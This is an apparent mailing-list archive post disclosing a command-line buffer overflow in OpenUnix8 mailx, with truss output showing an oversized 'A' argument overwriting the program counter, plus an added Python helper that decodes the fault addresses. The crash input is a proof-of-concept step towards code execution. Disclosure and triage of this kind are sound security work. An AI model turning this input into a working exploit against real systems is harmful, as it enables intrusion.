Vulnerability Development mailing list archives
OpenUnix8 mailx command line overflow
From: dotslash () snosoft com
Date: Sun, 21 Oct 2001 12:52:10 -0700
/bin/mail is a symlink to mailx. mailx is not suid however it suffers from a common buffer overflow
-KF

# truss mail `perl -e 'print "A" x 5122'`
execve("/bin/mail", 0x08045F18, 0x08045F24) argc = 2
open("//.mailrc", O_RDONLY, 0666) Err#2 ENOENT
    Incurred fault #6, FLTBOUNDS %pc = 0x202C4141
      siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141
    Received signal #11, SIGSEGV [default]
      siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141
        *** process killed ***

# truss mail `perl -e 'print "A" x 5124'`
    Incurred fault #6, FLTBOUNDS %pc = 0x41414141
      siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
    Received signal #11, SIGSEGV [default]
      siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
        *** process killed ***
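
Added example, not part of the original post: a small Python crash-triage helper that reads the truss fault lines quoted above and decodes %pc in the byte order it had in memory, which shows why the 5122-byte run faults at 0x202C4141 (two filler bytes followed by ", ") and the 5124-byte run at 0x41414141. The function name triage() and the 32-bit little-endian (i386) target are assumptions.

```python
import re
import struct

# truss fault lines quoted from the post above (5122 and 5124 "A" bytes).
TRUSS_5122 = """\
    Incurred fault #6, FLTBOUNDS %pc = 0x202C4141
      siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141
"""
TRUSS_5124 = """\
    Incurred fault #6, FLTBOUNDS %pc = 0x41414141
      siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
"""

FAULT_RE = re.compile(r"Incurred fault #\d+, (\w+)\s+%pc = 0x([0-9A-Fa-f]{1,8})")


def triage(truss_text, filler=b"A"):
    """Classify each fault by how much of %pc consists of the filler byte.

    Assumption: 32-bit little-endian target (i386), so the bytes in memory
    are in the reverse order of the hex value truss prints.
    """
    findings = []
    for fault, pc_hex in FAULT_RE.findall(truss_text):
        raw = struct.pack("<I", int(pc_hex, 16))  # bytes as stored in memory
        hits = raw.count(filler)
        if hits == len(raw):
            verdict = "pc fully input-controlled"
        elif hits and raw.startswith(filler * hits):
            verdict = "pc partially overwritten"
        else:
            verdict = "no filler bytes in pc"
        findings.append({
            "fault": fault,
            "pc": "0x" + pc_hex.upper(),
            "bytes": raw.decode("ascii", "replace"),
            "filler_bytes": hits,
            "verdict": verdict,
        })
    return findings


if __name__ == "__main__":
    for label, text in (("5122", TRUSS_5122), ("5124", TRUSS_5124)):
        for finding in triage(text):
            print(label, finding)
```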